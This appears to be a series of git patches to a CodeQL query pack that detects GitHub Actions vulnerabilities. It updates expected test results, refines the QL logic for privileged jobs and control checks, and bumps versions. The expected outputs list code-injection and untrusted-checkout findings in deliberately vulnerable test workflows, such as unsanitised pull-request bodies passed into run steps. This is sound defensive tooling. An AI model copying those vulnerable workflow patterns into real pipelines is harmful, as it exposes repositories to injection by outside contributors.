| Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | @@ -129,8 +151,26 @@ nodes | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/actions/action5/action.yml:4:3:4:7 | input taint | semmle.label | input taint | -| .github/actions/action5/action.yml:16:19:16:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | -| .github/actions/action5/action.yml:26:19:26:37 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | semmle.label | output Job outputs node [result2] | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | semmle.label | steps.step.outputs.result | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | semmle.label | steps.step2.outputs.result2 | +| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | semmle.label | Run Step: step [result] | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | semmle.label | inputs.taint | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | semmle.label | Run Step: step2 [result2] | +| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | @@ -183,7 +223,14 @@ nodes | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | semmle.label | Uses Step: foo [result2] | +| .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | semmle.label | Uses Step: foo [result] | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | semmle.label | steps.foo.outputs.result | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | semmle.label | steps.foo.outputs.result2 | +| .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | semmle.label | Uses Step: clone [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | semmle.label | steps.clone.outputs.result | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | @@ -289,6 +336,7 @@ nodes | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | @@ -387,6 +435,8 @@ nodes | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths +| .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 008c36967890..6d56b99407e0 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -19,12 +19,12 @@ | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:109:15:109:42 | actionsdesk/lfs-warning@v3.2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'actionsdesk/lfs-warning' with ref 'v3.2', not a pinned commit hash | .github/workflows/pr-workflow.yml:109:9:124:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:144:15:144:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:144:9:147:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:147:15:147:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:147:9:148:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:148:15:148:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:148:9:154:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:347:15:347:36 | docker/login-action@v2 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'docker/login-action' with ref 'v2', not a pinned commit hash | .github/workflows/pr-workflow.yml:346:9:351:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:356:15:356:44 | softprops/action-gh-release@v1 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'softprops/action-gh-release' with ref 'v1', not a pinned commit hash | .github/workflows/pr-workflow.yml:355:9:369:2 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:449:15:449:43 | cachix/install-nix-action@v20 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/install-nix-action' with ref 'v20', not a pinned commit hash | .github/workflows/pr-workflow.yml:449:9:452:6 | Uses Step | Uses Step | -| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'determinatesystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | +| .github/workflows/pr-workflow.yml:452:15:452:60 | DeterminateSystems/magic-nix-cache-action@main | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'DeterminateSystems/magic-nix-cache-action' with ref 'main', not a pinned commit hash | .github/workflows/pr-workflow.yml:452:9:453:6 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:453:15:453:41 | cachix/cachix-action@master | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'cachix/cachix-action' with ref 'master', not a pinned commit hash | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | Uses Step | | .github/workflows/test7.yml:25:15:25:34 | pnpm/action-setup@v3 | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/test13.yml:15:13:15:53 | sushichop/action-repository-permission@v2 | Unpinned 3rd party Action 'test13.yml' step $@ uses 'sushichop/action-repository-permission' with ref 'v2', not a pinned commit hash | .github/workflows/test13.yml:14:7:20:4 | Uses Step | Uses Step | From 0d55b4e784117431fd8be4c510a11975d857b5e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 21:59:10 +0200 Subject: [PATCH 534/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 84d4f5f3678e..4c1252d976d4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.51 +version: 0.1.52 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 0ef4c721e1a2..a8c891b256a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.51 +version: 0.1.52 groups: [actions, queries] suites: codeql-suites extractor: javascript From 356c20015832da0d2bf43c6d5f90c7beef74d4ac Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:03:55 +0200 Subject: [PATCH 535/707] Composite Action steps's getEnclosingJob should return the calling job --- ql/lib/codeql/actions/ast/internal/Ast.qll | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d1c7718d77b4..7659661bdac9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -105,7 +105,10 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets the enclosing Job. */ - JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } + JobImpl getEnclosingJob() { + result.getAChildNode*() = this.getParentNode() or + result = this.getEnclosingCompositeAction().getACallerJob() + } /** * Gets the enclosing workflow if any. From 43b61eb072615ac98509e19817540b7792b78eec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:04:57 +0200 Subject: [PATCH 536/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4c1252d976d4..a8a194c52ba6 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.52 +version: 0.1.53 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index a8c891b256a4..e4cb89696496 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.52 +version: 0.1.53 groups: [actions, queries] suites: codeql-suites extractor: javascript From 153fb492f72724145785678206e81668ae114f76 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 23:14:37 +0200 Subject: [PATCH 537/707] Update tests --- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + .../Security/CWE-829/.github/workflows/untrusted_checkout3.yml | 2 +- .../Security/CWE-829/UntrustedCheckoutCritical.expected | 1 + 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 3ad4e6915d23..609b09fdfef4 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -438,6 +438,7 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index e0d32875ee70..0a38be8b12be 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -1,6 +1,6 @@ name: Test on: - workflow_call: + workflow_run: workflows: [Trigger] types: [completed] diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 13637396f90e..afae24540787 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -274,6 +274,7 @@ edges | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | From b1ddbc9d13dab6b653f4c8aebdda2eb0df87635e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 25 Sep 2024 15:25:56 +0200 Subject: [PATCH 538/707] Improve Control Checks --- ql/lib/codeql/actions/Ast.qll | 6 +- ql/lib/codeql/actions/Helper.qll | 38 +--------- ql/lib/codeql/actions/ast/internal/Ast.qll | 67 ++++++++--------- .../codeql/actions/security/ControlChecks.qll | 7 +- .../Security/CWE-074/OutputClobberingHigh.ql | 13 +--- .../CWE-077/EnvPathInjectionCritical.ql | 13 +--- .../CWE-077/EnvVarInjectionCritical.ql | 17 ++--- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 8 +- .../Security/CWE-094/CodeInjectionCritical.ql | 10 +-- .../CWE-349/CachePoisoningViaCodeInjection.ql | 18 ++--- .../CWE-349/CachePoisoningViaDirectCache.ql | 29 ++++---- .../CachePoisoningViaPoisonableStep.ql | 25 ++++--- .../UntrustedCheckoutTOCTOUCritical.ql | 16 ++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 11 +-- .../CWE-829/ArtifactPoisoningCritical.ql | 7 +- .../CWE-829/ArtifactPoisoningPathTraversal.ql | 5 +- .../CWE-829/UntrustedCheckoutCritical.ql | 12 +-- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-829/UntrustedCheckoutMedium.ql | 2 - .../CWE-094/CodeInjectionMedium.expected | 1 - .../UntrustedCheckoutCritical.expected | 73 ++++++++++--------- 22 files changed, 168 insertions(+), 217 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c83abb1ea1dd..a1651eedc47d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -79,8 +79,6 @@ class CompositeAction extends AstNode instanceof CompositeActionImpl { UsesStep getACallerStep() { result = super.getACallerStep() } predicate isPrivileged() { super.isPrivileged() } - - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } } /** @@ -200,7 +198,9 @@ abstract class Job extends AstNode instanceof JobImpl { predicate isPrivileged() { super.isPrivileged() } - predicate isPrivilegedExternallyTriggerable() { super.isPrivilegedExternallyTriggerable() } + predicate isPrivilegedExternallyTriggerable(Event event) { + super.isPrivilegedExternallyTriggerable(event) + } } abstract class StepsContainer extends AstNode instanceof StepsContainerImpl { diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 0df7b1250199..9356950f5717 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -238,44 +238,12 @@ predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run.getScript(), "GITHUB_PATH", path) } -predicate inPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedExternallyTriggerableJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - j.isPrivilegedExternallyTriggerable() - ) -} - -predicate inPrivilegedContext(AstNode node) { - inPrivilegedCompositeAction(node) - or - inPrivilegedExternallyTriggerableJob(node) -} - -predicate inNonPrivilegedCompositeAction(AstNode node) { - exists(CompositeAction a | - a = node.getEnclosingCompositeAction() and - not a.isPrivilegedExternallyTriggerable() - ) -} - -predicate inNonPrivilegedJob(AstNode node) { - exists(Job j | - j = node.getEnclosingJob() and - not j.isPrivilegedExternallyTriggerable() - ) +predicate inPrivilegedContext(AstNode node, Event event) { + node.getEnclosingJob().isPrivilegedExternallyTriggerable(event) } predicate inNonPrivilegedContext(AstNode node) { - inNonPrivilegedCompositeAction(node) - or - inNonPrivilegedJob(node) + not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_) } string partialFileContentRegexp() { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7659661bdac9..154d466ab7df 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -359,18 +359,6 @@ class CompositeActionImpl extends AstNodeImpl, TCompositeAction { } EventImpl getATriggerEvent() { result = this.getACallerJob().getATriggerEvent() } - - /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - // the action is externally triggerable - exists(JobImpl caller, EventImpl event | - caller = this.getACallerJob() and - event = caller.getATriggerEvent() and - event.isExternallyTriggerable() and - // the action is privileged - (this.isPrivileged() or caller.isPrivileged()) - ) - } } class WorkflowImpl extends AstNodeImpl, TWorkflowNode { @@ -970,31 +958,30 @@ class JobImpl extends AstNodeImpl, TJobNode { } /** Holds if the action is privileged and externally triggerable. */ - predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | this.getATriggerEvent() = e | - // job is triggereable by an external user - e.isExternallyTriggerable() and - // no matter if `pull_request` is granted write permissions or access to secrets - // when the job is triggered by a `pull_request` event from a fork, they will get revoked - not e.getName() = "pull_request" and - ( - // job is privileged (write access or access to secrets) - this.isPrivileged() - or - // the trigger event is __normally__ privileged - e.isPrivileged() and - // and we have no runtime data to prove otherwise - not this.hasRuntimeData() and - // and the job is not explicitly non-privileged - not ( - ( - this.hasExplicitNonePermission() or - this.hasImplicitNonePermission() or - this.hasExplicitReadPermission() or - this.hasImplicitReadPermission() - ) and - not this.hasExplicitSecretAccess() - ) + predicate isPrivilegedExternallyTriggerable(EventImpl event) { + this.getATriggerEvent() = event and + // job is triggereable by an external user + event.isExternallyTriggerable() and + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not event.getName() = "pull_request" and + ( + // job is privileged (write access or access to secrets) + this.isPrivileged() + or + // the trigger event is __normally__ privileged + event.isPrivileged() and + // and we have no runtime data to prove otherwise + not this.hasRuntimeData() and + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() ) ) } @@ -1073,6 +1060,12 @@ class StepImpl extends AstNodeImpl, TStepNode { override YamlMapping getNode() { result = n } + override JobImpl getEnclosingJob() { + // if a step is within a composite action, we should follow the caller job + result = this.getEnclosingCompositeAction().getACallerJob() or + result = super.getEnclosingJob() + } + EnvImpl getEnv() { result.getNode() = n.lookup("env") } /** Gets the ID of this step, if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a3e1e15fe8c..052b22cd3387 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,9 +38,12 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event = step.getEnclosingWorkflow().getATriggerEvent() and + // The check dominates the step it should protect this.dominates(step) and - this.protectsCategoryAndEvent(category, event.getName()) + // The check is effective against the event and category + this.protectsCategoryAndEvent(category, event.getName()) and + // The check can be triggered by the event + this.getEnclosingJob().getATriggerEvent() = event } predicate dominates(Step step) { diff --git a/ql/src/Security/CWE-074/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql index 0ead5aa76890..2000e2100aef 100644 --- a/ql/src/Security/CWE-074/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -18,25 +18,20 @@ import codeql.actions.dataflow.ExternalFlow import OutputClobberingFlow::PathGraph import codeql.actions.security.ControlChecks -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink, Event event where OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and + inPrivilegedContext(sink.getNode().asExpr(), event) and // exclude paths to file read sinks from non-artifact sources ( not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), "code-injection") + check.protects(sink.getNode().asExpr(), event, "code-injection") ) or source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check - .protects(sink.getNode().asExpr(), - source.getNode().asExpr().getEnclosingJob().getATriggerEvent(), - ["untrusted-checkout", "artifact-poisoning"]) + check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof OutputClobberingFromFileReadSink or diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 9fa066d195ce..54e013f1091d 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -17,24 +17,19 @@ import 